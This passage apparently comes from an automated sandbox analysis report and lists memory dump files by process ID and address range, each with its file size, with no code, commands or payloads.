memory/3640-345-0x00000000008C0000-0x00000000008C1000-memory.dmpFilesize
4KB
-
memory/3640-352-0x000000001B5A0000-0x000000001B5A2000-memory.dmpFilesize
8KB
-
memory/3640-349-0x00000000010A0000-0x00000000010A1000-memory.dmpFilesize
4KB
-
memory/3980-436-0x0000000000000000-mapping.dmp
-
memory/4008-210-0x0000000000000000-mapping.dmp
-
memory/4124-146-0x0000000000000000-mapping.dmp
-
memory/4140-187-0x0000000000000000-mapping.dmp
-
memory/4168-408-0x0000000000000000-mapping.dmp
-
memory/4168-432-0x0000000005010000-0x0000000005628000-memory.dmpFilesize
6.1MB
-
memory/4216-253-0x0000000000000000-mapping.dmp
-
memory/4216-266-0x00000000019D0000-0x00000000019D2000-memory.dmpFilesize
8KB
-
memory/4276-177-0x0000000000000000-mapping.dmp
-
memory/4288-276-0x0000000000000000-mapping.dmp
-
memory/4288-288-0x0000000005700000-0x0000000005701000-memory.dmpFilesize
4KB
-
memory/4288-292-0x0000000002B60000-0x0000000002B61000-memory.dmpFilesize
4KB
-
memory/4288-318-0x00000000050E0000-0x00000000056F8000-memory.dmpFilesize
6.1MB
-
memory/4288-295-0x00000000051F0000-0x00000000051F1000-memory.dmpFilesize
4KB
-
memory/4288-305-0x0000000005120000-0x0000000005121000-memory.dmpFilesize
4KB
-
memory/4288-278-0x0000000000400000-0x0000000000422000-memory.dmpFilesize
136KB
-
memory/4288-301-0x0000000005300000-0x0000000005301000-memory.dmpFilesize
4KB
-
memory/4584-230-0x0000000000400000-0x000000000046D000-memory.dmpFilesize
436KB
-
memory/4584-214-0x0000000000000000-mapping.dmp
-
memory/4600-346-0x00000000020A0000-0x00000000020A1000-memory.dmpFilesize
4KB
-
memory/4600-339-0x0000000000000000-mapping.dmp
-
memory/4612-205-0x0000000000000000-mapping.dmp
-
memory/4624-201-0x0000000000000000-mapping.dmp
-
memory/4624-245-0x00000000050F0000-0x00000000050F1000-memory.dmpFilesize
4KB
-
memory/4624-228-0x00000000049D0000-0x00000000049D1000-memory.dmpFilesize
4KB
-
memory/4624-222-0x0000000000090000-0x0000000000091000-memory.dmpFilesize
4KB
-
memory/4624-234-0x0000000004980000-0x0000000004981000-memory.dmpFilesize
4KB
-
memory/4624-233-0x0000000004B30000-0x0000000004B31000-memory.dmpFilesize
4KB
-
memory/4780-195-0x0000000000000000-mapping.dmp
-
memory/4780-226-0x0000000000800000-0x0000000000801000-memory.dmpFilesize
4KB
-
memory/4780-247-0x00000000028F0000-0x00000000028F2000-memory.dmpFilesize
8KB
-
memory/4784-332-0x0000000000470000-0x0000000000471000-memory.dmpFilesize
4KB
-
memory/4784-344-0x0000000004E20000-0x00000000050A6000-memory.dmpFilesize
2.5MB
-
memory/4784-328-0x0000000000000000-mapping.dmp
-
memory/4824-185-0x0000000000000000-mapping.dmp
-
memory/4836-165-0x000000006B440000-0x000000006B4CF000-memory.dmpFilesize
572KB
-
memory/4836-166-0x000000006FE40000-0x000000006FFC6000-memory.dmpFilesize
1.5MB
-
memory/4836-149-0x0000000000000000-mapping.dmp
-
memory/4836-169-0x0000000064940000-0x0000000064959000-memory.dmpFilesize
100KB
-
memory/4836-167-0x000000006B280000-0x000000006B2A6000-memory.dmpFilesize
152KB
-
memory/4836-168-0x0000000064940000-0x0000000064959000-memory.dmpFilesize
100KB
-
memory/4836-170-0x0000000064940000-0x0000000064959000-memory.dmpFilesize
100KB
-
memory/4836-171-0x0000000064940000-0x0000000064959000-memory.dmpFilesize
100KB
-
memory/4872-191-0x0000000000000000-mapping.dmp
-
memory/5040-401-0x0000000004C00000-0x00000000051A6000-memory.dmpFilesize
5.6MB
-
memory/5040-389-0x0000000000000000-mapping.dmp
-
memory/5064-175-0x0000000000000000-mapping.dmp
-
memory/5156-327-0x0000000000000000-mapping.dmp
-
memory/5156-601-0x0000000005590000-0x0000000005BA8000-memory.dmpFilesize
6.1MB
-
memory/5156-333-0x0000000000400000-0x0000000000414000-memory.dmpFilesize
80KB
-
memory/5188-260-0x0000000000140000-0x0000000000141000-memory.dmpFilesize
4KB
-
memory/5188-343-0x000000001C1D0000-0x000000001C1D1000-memory.dmpFilesize
4KB
-
memory/5188-256-0x0000000000000000-mapping.dmp
-
memory/5188-289-0x0000000000920000-0x0000000000921000-memory.dmpFilesize
4KB
-
memory/5188-340-0x000000001BAD0000-0x000000001BAD1000-memory.dmpFilesize
4KB
-
memory/5188-300-0x00000000021A0000-0x00000000021A2000-memory.dmpFilesize
8KB
-
memory/5192-511-0x0000000000000000-mapping.dmp
-
memory/5248-259-0x0000000000000000-mapping.dmp
-
memory/5248-263-0x0000000000510000-0x0000000000511000-memory.dmpFilesize
4KB
-
memory/5372-277-0x0000000000CA0000-0x0000000000CA1000-memory.dmpFilesize
4KB
-
memory/5372-269-0x0000000000000000-mapping.dmp
-
memory/5372-600-0x0000000002E50000-0x0000000002E7F000-memory.dmpFilesize
188KB
-
memory/5372-500-0x000000001D080000-0x000000001D082000-memory.dmpFilesize
8KB
-
memory/5408-296-0x0000000000EF0000-0x0000000000EF1000-memory.dmpFilesize
4KB
-
memory/5408-302-0x000000001B410000-0x000000001B412000-memory.dmpFilesize
8KB
-
memory/5408-272-0x0000000000000000-mapping.dmp
-
memory/5408-287-0x0000000000730000-0x0000000000731000-memory.dmpFilesize
4KB
-
memory/5444-275-0x0000000000000000-mapping.dmp
-
memory/5444-293-0x000000001B890000-0x000000001B892000-memory.dmpFilesize
8KB
-
memory/5444-285-0x0000000000CA0000-0x0000000000CA1000-memory.dmpFilesize
4KB
-
memory/5452-459-0x0000000000C30000-0x0000000000C32000-memory.dmpFilesize
8KB
-
memory/5452-451-0x0000000000000000-mapping.dmp
-
memory/5516-337-0x0000000000000000-mapping.dmp
-
memory/5544-390-0x0000000005D60000-0x0000000005D61000-memory.dmpFilesize
4KB
-
memory/5544-338-0x0000000000000000-mapping.dmp
-
memory/5568-462-0x00000000021A0000-0x00000000021A1000-memory.dmpFilesize
4KB
-
memory/5568-452-0x0000000000000000-mapping.dmp
-
memory/5580-291-0x0000000000000000-mapping.dmp
-
memory/5580-330-0x0000000004770000-0x000000000479F000-memory.dmpFilesize
188KB
-
memory/5648-562-0x00000000053B0000-0x00000000059C8000-memory.dmpFilesize
6.1MB
-
memory/5660-547-0x000000001B140000-0x000000001B142000-memory.dmpFilesize
8KB
-
memory/5700-499-0x0000000000000000-mapping.dmp
-
memory/5704-506-0x0000000001A85000-0x0000000001A87000-memory.dmpFilesize
8KB
-
memory/5704-463-0x0000000000000000-mapping.dmp
-
memory/5704-501-0x0000000001A84000-0x0000000001A85000-memory.dmpFilesize
4KB
-
memory/5704-468-0x0000000001A80000-0x0000000001A82000-memory.dmpFilesize
8KB
-
memory/5704-502-0x0000000001A82000-0x0000000001A84000-memory.dmpFilesize
8KB
-
memory/5716-365-0x0000000005AD0000-0x0000000005AD1000-memory.dmpFilesize
4KB
-
memory/5716-348-0x0000000000580000-0x0000000000581000-memory.dmpFilesize
4KB
-
memory/5716-303-0x0000000000000000-mapping.dmp
-
memory/5740-460-0x00000000010A0000-0x00000000010A2000-memory.dmpFilesize
8KB
-
memory/5740-493-0x00000000010A4000-0x00000000010A5000-memory.dmpFilesize
4KB
-
memory/5740-510-0x00000000010A5000-0x00000000010A6000-memory.dmpFilesize
4KB
-
memory/5740-503-0x00000000010A6000-0x00000000010A7000-memory.dmpFilesize
4KB
-
memory/5740-455-0x0000000000000000-mapping.dmp
-
memory/5756-319-0x000000001AF00000-0x000000001AF02000-memory.dmpFilesize
8KB
-
memory/5756-310-0x00000000002B0000-0x00000000002B1000-memory.dmpFilesize
4KB
-
memory/5756-304-0x0000000000000000-mapping.dmp
-
memory/5768-351-0x0000000000000000-mapping.dmp
-
memory/5924-313-0x0000000000000000-mapping.dmp
-
memory/5924-321-0x0000000000400000-0x0000000000414000-memory.dmpFilesize
80KB
-
memory/6000-531-0x0000029EF6455000-0x0000029EF6457000-memory.dmpFilesize
8KB
-
memory/6000-528-0x0000029EF6452000-0x0000029EF6454000-memory.dmpFilesize
8KB
-
memory/6000-523-0x0000029EF6450000-0x0000029EF6452000-memory.dmpFilesize
8KB
-
memory/6000-515-0x0000000000000000-mapping.dmp
-
memory/6000-530-0x0000029EF6454000-0x0000029EF6455000-memory.dmpFilesize
4KB
-
memory/6016-320-0x0000000000000000-mapping.dmp
-
memory/6044-322-0x0000000000000000-mapping.dmp
-
memory/6044-329-0x00000000021B0000-0x00000000021B1000-memory.dmpFilesize
4KB
-
memory/6072-324-0x0000000000000000-mapping.dmp
-
memory/6072-376-0x0000000005D00000-0x0000000005D01000-memory.dmpFilesize
4KB
-
memory/6076-537-0x0000000005350000-0x0000000005351000-memory.dmpFilesize
4KB
-
memory/6116-326-0x0000000000000000-mapping.dmp
-
memory/6344-572-0x0000000000810000-0x0000000000813000-memory.dmpFilesize
12KB
-
memory/6412-575-0x00000000014E0000-0x00000000014F0000-memory.dmpFilesize
64KB
-
memory/6412-580-0x0000000001500000-0x0000000001512000-memory.dmpFilesize
72KB